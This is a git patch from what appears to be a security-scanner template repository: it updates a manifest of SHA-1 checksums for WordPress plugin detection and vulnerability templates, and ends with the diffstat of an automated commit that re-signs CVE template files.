+http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:068ff5c601a3b20415e9e81a9390c707bafea42f +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:c213288d6a0c9cb9a04bd6ef54b0409af0eb1c1d +http/technologies/wordpress/plugins/mailpoet.yaml:6ffd9a434f1bbddbf6b86a6d145520c04ef52dc6 +http/technologies/wordpress/plugins/maintenance.yaml:c4d360af0cd89d108ab72fab70acd6736d17085e +http/technologies/wordpress/plugins/mainwp-child.yaml:b3afe67b7c823e419c6967b83e081a51a7a77e80 +http/technologies/wordpress/plugins/malcare-security.yaml:a49701ac4e0e6f2d3181cc3d460225b1b4c79eaf +http/technologies/wordpress/plugins/megamenu.yaml:7e2e09a93836ea44aaac07fd904f0a45d1809cb2 +http/technologies/wordpress/plugins/members.yaml:2cbc5d8a204d0a2e770dab34f36bf89a9b24fef6 +http/technologies/wordpress/plugins/meta-box.yaml:60abae0a8a582ea150337534b3f343ab96417d9a +http/technologies/wordpress/plugins/metform.yaml:cbb963b439b396fd4830823dd1a60e11de879ab4 +http/technologies/wordpress/plugins/ml-slider.yaml:a014ecdb96af539598b3d3c1b8d65998fa399601 +http/technologies/wordpress/plugins/newsletter.yaml:8333f47e2bd5aabcb18cbe5176b653954aa81106 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:885ad4b6faff35c8b735ae1fafc563656afd5d5c +http/technologies/wordpress/plugins/nextgen-gallery.yaml:c631e2730311327a2bc80f3a10b8114d08789a15 +http/technologies/wordpress/plugins/ninja-forms.yaml:09960e59a7131f6895ef16933acacd710cda7efc +http/technologies/wordpress/plugins/ocean-extra.yaml:28be5642bc8dff333a5bbc13514343ad4ad5cad6 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:391c36490be295b2537bb667b07a27e78a69bf04 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:c7e66545073134742f839ffec58cf38dbd743fe5 +http/technologies/wordpress/plugins/optinmonster.yaml:bcb4f3774a6c57088c5c5905f376ff45e2355340 +http/technologies/wordpress/plugins/otter-blocks.yaml:08b4c8f0ddbfe4560a2cc1812894f0a41855d750 +http/technologies/wordpress/plugins/password-protected.yaml:a44b93895df9e85d252feceefc0935aae2f3fabb +http/technologies/wordpress/plugins/pdf-embedder.yaml:3f5aa2e8a212a965ff1e1a642c52c43d54420b0e http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:3a92994823f55a35f83a9f7981e0af7afa8deaf4 -http/technologies/wordpress/plugins/pixelyoursite.yaml:a3fa223e51a425af754b6df75d49f683e167b02b -http/technologies/wordpress/plugins/polylang.yaml:59a75ab5c74d3fb550334784f47cc1cdd914db6f +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:8e1189032e614d68bef88f6821e6f675c563f9a8 +http/technologies/wordpress/plugins/pixelyoursite.yaml:708c52c165a1989d729e244951d5ac6d06368b9d +http/technologies/wordpress/plugins/polylang.yaml:3da7824593f3100bac1b88fd79bf713cce6b2c9e http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:e65eba15ab4cc9cee64f0df4143fa8c254e858fb -http/technologies/wordpress/plugins/post-smtp.yaml:0045f7325b47246739a83003ddda006bb3d2535d -http/technologies/wordpress/plugins/post-types-order.yaml:19f93bc32ed9ef24c3913a6a5eed8f91937de32d -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:8aa280e2dba3240d287f2220353889a43dbf1e3f -http/technologies/wordpress/plugins/pretty-link.yaml:a05dd32ba638f8c2a21616c586590935fad4cbf8 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:406a96ff7af248036742b470bf33aa890d5aa8a7 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:e2f79040288f4dbbc1cc2aa19413940cd76da8d3 -http/technologies/wordpress/plugins/redirection.yaml:b104e7c97a397f5419cb3a4034a1d3534bf38e0d -http/technologies/wordpress/plugins/redux-framework.yaml:f8f3d673ee5775c64d3a5d896ffbe3351f4a9236 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:cff8f6bd1d71142370b330c4c4d985275149e895 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:45049e21f802d000dd05a2161af0f46a3606e62f -http/technologies/wordpress/plugins/safe-svg.yaml:73bc6a488d6889c287be592792a6615ba8a88f8f -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:19a4f938c91c1de9b7faed269ffa80bbdf24e413 -http/technologies/wordpress/plugins/sg-cachepress.yaml:e7083e166d8d0323a17ac3bf2159ef348e56e747 -http/technologies/wordpress/plugins/sg-security.yaml:a17daecdb2dac74eb91e6fdff35890f6cdb963af -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:8e63168e0333865420c6f8284dc57a6c4293d871 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:1740abbb0efabec55402b0dac330dfdbd0626954 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:bd85d3af9568a82e1182fe49b8c848be682fb17a -http/technologies/wordpress/plugins/simple-history.yaml:f66d512367509526317dbda897e21f767d0c2551 +http/technologies/wordpress/plugins/popup-maker.yaml:6eaa3b3bfa5b2e78d636920ccbb06a712345947f +http/technologies/wordpress/plugins/post-smtp.yaml:2ae9846878047e77ea920455ff78253537018893 +http/technologies/wordpress/plugins/post-types-order.yaml:6861ba7ac0d31c382a88c561185651d76b10c19b +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:872d000e5850a66a6c6c3ab63964bfef537a6c26 +http/technologies/wordpress/plugins/pretty-link.yaml:2198d2d18fe5aa2918946b2240800d4a09826418 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:12d32afa070add53f14d189a24189eb3801bc0e3 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:5e1e09c899e953565d2e8af3d749f84f07a8a8ab +http/technologies/wordpress/plugins/redirection.yaml:f61f7d62a41816e6c61ee4d6773ffe28f3ef9c44 +http/technologies/wordpress/plugins/redux-framework.yaml:5cd5623e3e73a46b74c67c966227d3b13d2dc049 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:af13056e6c96be0c63ab5b09a922c25a029ad2bc +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:1cedc642bdba7886f167b39aa976136349eb90a8 +http/technologies/wordpress/plugins/safe-svg.yaml:f3820a7a16402b72defd60c233d2bd707357232e +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:6b0e8ebf64b9716a0af81c569b701bd842e5611b +http/technologies/wordpress/plugins/sg-cachepress.yaml:cf660606db14a19bc44937f65f4460b8884c73c5 +http/technologies/wordpress/plugins/sg-security.yaml:14f4301b39956cb337b89a2ca2d09382e8cab798 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2bfd9c52b5cb7514598822edf4ca3de7859ae062 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:c1edc2b8d4efdfc827219f6b1821b7e8e876fcdc +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:2795cfbc90f0b31a89d35717cdfd7edacd31fd3c +http/technologies/wordpress/plugins/simple-history.yaml:92ba6cfe8cf54c9ba9e1342c7c410bbf290baa78 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:62978e0ae520e556ffa6f70bc928abbc02e794a9 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:68d86fc248b0d7cd82f76893606532d4520634cb -http/technologies/wordpress/plugins/smart-slider-3.yaml:ef6fb0b703f0cc77368868a89b3d2a711c88d722 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:d522f9538fd0a99aabdb0fa0586a357a76e70c85 +http/technologies/wordpress/plugins/siteguard.yaml:6aa68d1b4be1c8c5caba20765c1ef0f251014250 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:c39b414801769ab561db6f2f2caad8106573c224 +http/technologies/wordpress/plugins/smart-slider-3.yaml:5a0a96d9baff270140f6c9c3bd8f3329239d81e3 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:3f3a7bf82386485df02e0ca381480ad0f9798fd4 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:b0de378b1d33c720aa432a755b9f5d9aa3a5e577 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:da7c2c2ee325e7cfa91d8cd8fdc278810151e3f9 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:dc5b37057a031ca9838be5d877b33c265e845f19 -http/technologies/wordpress/plugins/svg-support.yaml:4389f73ab6c6dea05ae81f70ed972196b4f67f6d +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:9bdd571eaeb2d15e839ab548c220aba24cf8362e +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:e3f6ca011be13c08d767b70363b7c2a1aa4bdf41 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:70a556d68063b6b8ca9b309076f54d0b6ad9dcd7 +http/technologies/wordpress/plugins/svg-support.yaml:893985d3f66b9a6a749ad5dc9f5ba4008d7e9c94 http/technologies/wordpress/plugins/table-of-contents-plus.yaml:142cf7dc3d34ed35422ad91447b3f1f986d965b6 -http/technologies/wordpress/plugins/tablepress.yaml:cde6ed4a85f31309c5aa531c0fbbd27003dbe7d1 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a1ec7f94bb4156bb27cb4abd94a562952cdf6e69 -http/technologies/wordpress/plugins/templately.yaml:375a077548a644291a4078b26c78fc62f03c702a -http/technologies/wordpress/plugins/the-events-calendar.yaml:02af719e9bd4c86b2980ba41d99fb6b2ea2f5f40 +http/technologies/wordpress/plugins/tablepress.yaml:f62aed3020023b33414821f04549666f6071daa2 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:ccde67bbcb45e33705a3d52790d86a1c613e7212 +http/technologies/wordpress/plugins/templately.yaml:4d42768d82f172c1545bfc379dd60ffeca950efa +http/technologies/wordpress/plugins/the-events-calendar.yaml:a62b5a15da38ae5b15820ee410318c861cc9be7e http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:bf3681282ebb6f2e6f6c2b0bd771099f48c18ac5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:ffc5da16590d07969e98e5f5554c66f491447b95 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:38edb89cfcb6e5d3f088879a31a8271e9b3ad159 -http/technologies/wordpress/plugins/under-construction-page.yaml:bb8f0353406248bce15c9b4bfbacdcbe133caa62 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:d1f1942273b71fd2439f0db6fe764e28b9cab038 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:6b9356308a5caf4da39ba4364f023b62d67d7ae3 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:b70a7b958b59bb0ae47fccc4b7eafcebb1277932 +http/technologies/wordpress/plugins/under-construction-page.yaml:ae9a41a4acda89f4fb49bc2717df70f26be0289e http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:9f792b6f3cffd596c4811d95eb1eec6741507192 +http/technologies/wordpress/plugins/updraftplus.yaml:99feef71fc7e5faf4143729689734726137a4eb8 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:3cacca92b6ed6305e1264dd761705458d64eab3d +http/technologies/wordpress/plugins/user-role-editor.yaml:e4671120b256c8dc6e7be1ce15b73d90a14f4a6d http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:b0b44dee75cfa050a2a6cd70f5c791fca4b112ea -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:e40db0d83d160ccf5e792ccfc282940f98b16fba -http/technologies/wordpress/plugins/webp-express.yaml:8a75fee3d134d892d14e2a3b6afea38ed4cceb2e +http/technologies/wordpress/plugins/w3-total-cache.yaml:c53c4f112133f21537e5e7635e1cef706ccca5c8 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:088c74a47d729d77c4351ded8a1b0315946450af +http/technologies/wordpress/plugins/webp-express.yaml:bb2f7af31a7e9476f06b754c0936f8740a72a0be http/technologies/wordpress/plugins/widget-importer-exporter.yaml:6704a9b4d0dcda2afcbac6ec83aab1e38ff1f0dc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:07803614b6573b619f3ed791fa5625e935f7e3ca -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0fbe62307a61913b31c83b0dfebb6ae9339c0fe0 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:56c83ee5f6eb504ec25dbb539862fb75efba8509 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:be0445f8a1df7a89776280cdf67d0d5d7c8a0762 http/technologies/wordpress/plugins/woo-inpost.yaml:ccc431985c9227d06dce6cd78efea4b46ddf791c -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:c2c51c81bc016d8ea059c7ddac100286b846f318 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:c94298cfeaa2318f7378deab469446c35b2245e0 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:090e8810208a527a148100660fdb9936763447b0 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:ef9dc93bc91c4616a2adfde95e8daf9d646837d9 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:d92cad60acaad36b1f120e1db00dfe044554d71a -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:9bd8eb7941fce1bf03a971be46b414076aac9de1 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:e9b2ad8b05b26dd90f1c9505b47cfad0b1c2fb0a -http/technologies/wordpress/plugins/woocommerce-services.yaml:d5f3d580c8c51856429e877049559654906a2b24 -http/technologies/wordpress/plugins/woocommerce.yaml:aef501a02c52c0e8326ef6c19f8d347150d15d47 -http/technologies/wordpress/plugins/wordfence.yaml:ba7beb8f1687ffd2703d0388f9394e203f19291a -http/technologies/wordpress/plugins/wordpress-importer.yaml:f82f2cada9bedf274b2b7c8c5ed5c4f35f7616f2 -http/technologies/wordpress/plugins/wordpress-seo.yaml:35629696f21bfc85db76a01c0daf2bfa8a9a94e2 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:3801dbf8a2735f33cf6f471dedae91d4219379bf +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:83feab1a35f41d55a8709a4e7965bee6ec97ed9b +http/technologies/wordpress/plugins/woocommerce-payments.yaml:0933dcaeeef0c7de1dbc8fd58284400cff87b087 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:6b41a46de7961b1f41a2a79cd07ee2bc00143067 +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:078ee93a75b2c9acc4d4500e86ff189c3e01a901 +http/technologies/wordpress/plugins/woocommerce-services.yaml:5085545275a6bc43dd6f007dd4a9802c331853eb +http/technologies/wordpress/plugins/woocommerce.yaml:1b6ca1ac7b7a789dbc35cfbca7022395b1d2df96 +http/technologies/wordpress/plugins/wordfence.yaml:183842c027c0e709b582ad4794018e65ae1a026d +http/technologies/wordpress/plugins/wordpress-importer.yaml:fe1b182c740e2f09748d60f47d00b4bd0a25caa9 +http/technologies/wordpress/plugins/wordpress-seo.yaml:6cdd086ee6678a44c2cfb75dd491b66ac2d46f63 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:dbbd98bfa519866439545a829b3b4c9f23a80493 -http/technologies/wordpress/plugins/wp-crontrol.yaml:966864c5220a4b9fc0937bae5601c962cd91a0b2 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3604dc47debc9b7b5f34847b3026731b82ca145e -http/technologies/wordpress/plugins/wp-file-manager.yaml:23f869ec905a61347aaafa61d5c18fc99f194b47 -http/technologies/wordpress/plugins/wp-google-maps.yaml:deb67ea682e1538fd52c9015664369476bd09a18 -http/technologies/wordpress/plugins/wp-mail-logging.yaml:fededd8bba3d0deb3ddb1310d21739e186145993 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:c340ca1428e6e151c45fbee8a0ad54986960985b -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:b69b7c8b1eb7b32937017a39894b70f48e440a4a +http/technologies/wordpress/plugins/worker.yaml:1d2ba44b040543e87c2e90239d4bcafd2c1a0ba4 +http/technologies/wordpress/plugins/wp-crontrol.yaml:cce73a887be884cbe94c7c5ec0d329665ec5fa99 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:7bc7f5a95c3a184cb468b78ff142aa0de836b647 +http/technologies/wordpress/plugins/wp-file-manager.yaml:b4960a607b72f90f69fdc476a29034b43a48cb38 +http/technologies/wordpress/plugins/wp-google-maps.yaml:fa58eaac029b517127621485301aa109a51db1d1 +http/technologies/wordpress/plugins/wp-mail-logging.yaml:2d687b48a636d56a6d74f7991bdef6c61f351c38 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:05be289618e50fef665e1ad0bf466fac3d369908 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:cf14b80400a352743b6f1e0e73c8b80b6c02447a http/technologies/wordpress/plugins/wp-migrate-db.yaml:e4d387e29ada0961b3320d2b69e8773746ca268a -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:cbf8a72a951934b90dba22b9cb6d7603483bef25 -http/technologies/wordpress/plugins/wp-optimize.yaml:f5d05af2602337f8b7ad7793f5edafaf80654a55 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:ee5207f6a2b828e574ada1b287d7a0ea2cf2c1fb -http/technologies/wordpress/plugins/wp-reset.yaml:fbf5cf5d1273085a71df4b50f0a526ed9a70165a -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:505f198b6041d2e4b31eddd90386beeb4310292d -http/technologies/wordpress/plugins/wp-rollback.yaml:6b7dd0003361943caebaf587174789a48ed59e6c -http/technologies/wordpress/plugins/wp-seopress.yaml:3f92a09bc9739e383d741be5d858a58d08a47d7f -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:6160106f7f940638c19d77b61d2e6b1c350ed7e3 -http/technologies/wordpress/plugins/wp-smushit.yaml:312d166045b54aac744b887fa798a50b1a7bb38e -http/technologies/wordpress/plugins/wp-statistics.yaml:e5d2ceb34ee4f3d2c9d84249d297b551f98f4de0 -http/technologies/wordpress/plugins/wp-super-cache.yaml:1f8451a321e308dccdebda387ba6a203e670971a +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:53875bc129201e43cd06d429adc616e21c35f476 +http/technologies/wordpress/plugins/wp-optimize.yaml:ad123716b992750e4a6c0afe4e05bf41d14792b1 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:52ccce541571f65bcda552b241f6afdcd80eb9a9 +http/technologies/wordpress/plugins/wp-reset.yaml:214b24490f07721a17e4e4e29fb226b8838cb188 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:2366df6c813a8dbd1f4b74da75a9900a1dc56af1 +http/technologies/wordpress/plugins/wp-rollback.yaml:087be74e45781ab1ef30b21d9ab240392ea80058 +http/technologies/wordpress/plugins/wp-seopress.yaml:fec90651b56ac2c123bf00596736407d397e5925 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:ed729d571de3d59671171595ca10624d3919d030 +http/technologies/wordpress/plugins/wp-smushit.yaml:e6602a59531736f35da698cc00a26195d73b7066 +http/technologies/wordpress/plugins/wp-statistics.yaml:a9720e0a0a85938604f1ea7a29b214c877eb23d0 +http/technologies/wordpress/plugins/wp-super-cache.yaml:da22588fd65e7a7b0dccb6d33c7c4a7b3e5aa59a http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:891a9265c6034da1b6be7644fcdb6c349be33ccc -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:d4ae34cc5f7e9be5039671da848c314fcde4b5e8 -http/technologies/wordpress/plugins/wpforms-lite.yaml:a2136830770706d1fb76391759454afd52f187c9 -http/technologies/wordpress/plugins/wps-hide-login.yaml:53c84e8eeee8b6ed1d5a049ce28b36b9dc048239 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:681bc426531f4312d7d1e69c044860261bfd280f +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:dcb21c22ee5fe2795152d09f118097ddadf358d5 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:0580fbb527643b9b05965b2d2d7e95ec7b85baa3 +http/technologies/wordpress/plugins/wpforms-lite.yaml:c8faf108d82096f718dcd825cc744e304d091755 +http/technologies/wordpress/plugins/wps-hide-login.yaml:b303e8cf0fa9bc7b8a370e0a09213a9231fb5c73 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:98500d3e3fea49010a9421cc18be10b3e98fde8b http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:b5941ccb82e175594bb0454df4c13665033b27f7 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:faf080c2b00a7983a58bd212864a84d4309e5f9b http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:cf9a544627bf169a3572f810cd893cecdfdaec2d http/technologies/wordpress-detect.yaml:743b35c9139a66a10e24776aabe59d58f5e4f63c http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -9232,7 +9234,7 @@ http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml:053fcb11256eef5a62c09c7c6cb http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml:3a975b7bbbfcebf3e5c188bcdd14cd7a3adfbcd2 http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml:1dc3dc257a37960cfc7f288764e3299a99097e0e http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml:e9e201ac2d626d5305fc854a70b1c11166afd2fb -http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml:c08433834e3ea55effae1558d039e7a226024984 +http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml:f7daa49572ea196a0352ce5c1f9fe61d50cf4b8a http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml:863c7dc541872dcf963d4224201ce604030d618f http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml:ad806552bd9cebde1708802b2e820cca481f63e4 http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml:3ec0448657f9c8f51541be866f24f38363f39352 @@ -9495,7 +9497,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7a87b35f4700913b6e89010cab0e25696c79c9a9 +templates-checksum.txt:2e28ca573337f73159bd0e5ffabab8c050d17247 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 447c2b302aeed6fe41ca02237952a09783f41d1b Mon Sep 17 00:00:00 2001 From: ghost Date: Fri, 18 Oct 2024 13:05:19 +0000 Subject: [PATCH 218/218] =?UTF-8?q?chore:=20sign=20templates=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- dast/vulnerabilities/sqli/time-based-sqli.yaml | 3 +-- http/cves/2015/CVE-2015-2196.yaml | 2 +- http/cves/2015/CVE-2015-4062.yaml | 2 +- http/cves/2015/CVE-2015-9323.yaml | 2 +- http/cves/2018/CVE-2018-16159.yaml | 2 +- http/cves/2018/CVE-2018-7282.yaml | 2 +- http/cves/2019/CVE-2019-7139.yaml | 2 +- http/cves/2020/CVE-2020-11530.yaml | 2 +- http/cves/2020/CVE-2020-17463.yaml | 2 +- http/cves/2020/CVE-2020-26248.yaml | 2 +- http/cves/2020/CVE-2020-27481.yaml | 2 +- http/cves/2021/CVE-2021-24340.yaml | 2 +- http/cves/2021/CVE-2021-24442.yaml | 2 +- http/cves/2021/CVE-2021-24554.yaml | 2 +- http/cves/2021/CVE-2021-24731.yaml | 2 +- http/cves/2021/CVE-2021-24762.yaml | 2 +- http/cves/2021/CVE-2021-24791.yaml | 2 +- http/cves/2021/CVE-2021-24827.yaml | 2 +- http/cves/2021/CVE-2021-24849.yaml | 2 +- http/cves/2021/CVE-2021-24862.yaml | 2 +- http/cves/2021/CVE-2021-24931.yaml | 2 +- http/cves/2021/CVE-2021-24943.yaml | 2 +- http/cves/2021/CVE-2021-24946.yaml | 2 +- http/cves/2021/CVE-2021-25114.yaml | 2 +- http/cves/2021/CVE-2021-25899.yaml | 2 +- http/cves/2021/CVE-2021-27314.yaml | 2 +- http/cves/2021/CVE-2021-27315.yaml | 2 +- http/cves/2021/CVE-2021-27316.yaml | 2 +- http/cves/2021/CVE-2021-27319.yaml | 2 +- http/cves/2021/CVE-2021-27320.yaml | 2 +- http/cves/2021/CVE-2021-3110.yaml | 2 +- http/cves/2021/CVE-2021-39165.yaml | 2 +- http/cves/2022/CVE-2022-0228.yaml | 2 +- http/cves/2022/CVE-2022-0349.yaml | 2 +- http/cves/2022/CVE-2022-0412.yaml | 2 +- http/cves/2022/CVE-2022-0651.yaml | 2 +- http/cves/2022/CVE-2022-0658.yaml | 2 +- http/cves/2022/CVE-2022-0693.yaml | 2 +- http/cves/2022/CVE-2022-0747.yaml | 2 +- http/cves/2022/CVE-2022-0760.yaml | 2 +- http/cves/2022/CVE-2022-0769.yaml | 2 +- http/cves/2022/CVE-2022-0773.yaml | 2 +- http/cves/2022/CVE-2022-0784.yaml | 2 +- http/cves/2022/CVE-2022-0785.yaml | 2 +- http/cves/2022/CVE-2022-0786.yaml | 2 +- http/cves/2022/CVE-2022-0787.yaml | 2 +- http/cves/2022/CVE-2022-0788.yaml | 2 +- http/cves/2022/CVE-2022-0826.yaml | 2 +- http/cves/2022/CVE-2022-0827.yaml | 2 +- http/cves/2022/CVE-2022-0846.yaml | 2 +- http/cves/2022/CVE-2022-0867.yaml | 2 +- http/cves/2022/CVE-2022-0948.yaml | 2 +- http/cves/2022/CVE-2022-0949.yaml | 2 +- http/cves/2022/CVE-2022-1013.yaml | 2 +- http/cves/2022/CVE-2022-1057.yaml | 2 +- http/cves/2022/CVE-2022-1768.yaml | 2 +- http/cves/2022/CVE-2022-1883.yaml | 2 +- http/cves/2022/CVE-2022-22897.yaml | 2 +- http/cves/2022/CVE-2022-24223.yaml | 2 +- http/cves/2022/CVE-2022-24265.yaml | 2 +- http/cves/2022/CVE-2022-24266.yaml | 2 +- http/cves/2022/CVE-2022-2467.yaml | 2 +- http/cves/2022/CVE-2022-25148.yaml | 2 +- http/cves/2022/CVE-2022-25149.yaml | 2 +- http/cves/2022/CVE-2022-27984.yaml | 2 +- http/cves/2022/CVE-2022-28032.yaml | 2 +- http/cves/2022/CVE-2022-3142.yaml | 2 +- http/cves/2022/CVE-2022-31499.yaml | 2 +- http/cves/2022/CVE-2022-31976.yaml | 2 +- http/cves/2022/CVE-2022-31977.yaml | 2 +- http/cves/2022/CVE-2022-31978.yaml | 2 +- http/cves/2022/CVE-2022-33965.yaml | 2 +- http/cves/2022/CVE-2022-3768.yaml | 2 +- http/cves/2022/CVE-2022-3800.yaml | 2 +- http/cves/2022/CVE-2022-40032.yaml | 2 +- http/cves/2022/CVE-2022-4049.yaml | 2 +- http/cves/2022/CVE-2022-4050.yaml | 2 +- http/cves/2022/CVE-2022-4059.yaml | 2 +- http/cves/2022/CVE-2022-4117.yaml | 2 +- http/cves/2022/CVE-2022-44290.yaml | 2 +- http/cves/2022/CVE-2022-44291.yaml | 2 +- http/cves/2022/CVE-2022-45805.yaml | 2 +- http/cves/2023/CVE-2023-0261.yaml | 2 +- http/cves/2023/CVE-2023-0600.yaml | 2 +- http/cves/2023/CVE-2023-0630.yaml | 2 +- http/cves/2023/CVE-2023-0900.yaml | 2 +- http/cves/2023/CVE-2023-1408.yaml | 2 +- http/cves/2023/CVE-2023-1730.yaml | 2 +- http/cves/2023/CVE-2023-2130.yaml | 2 +- http/cves/2023/CVE-2023-23488.yaml | 2 +- http/cves/2023/CVE-2023-23489.yaml | 2 +- http/cves/2023/CVE-2023-27032.yaml | 2 +- http/cves/2023/CVE-2023-27034.yaml | 2 +- 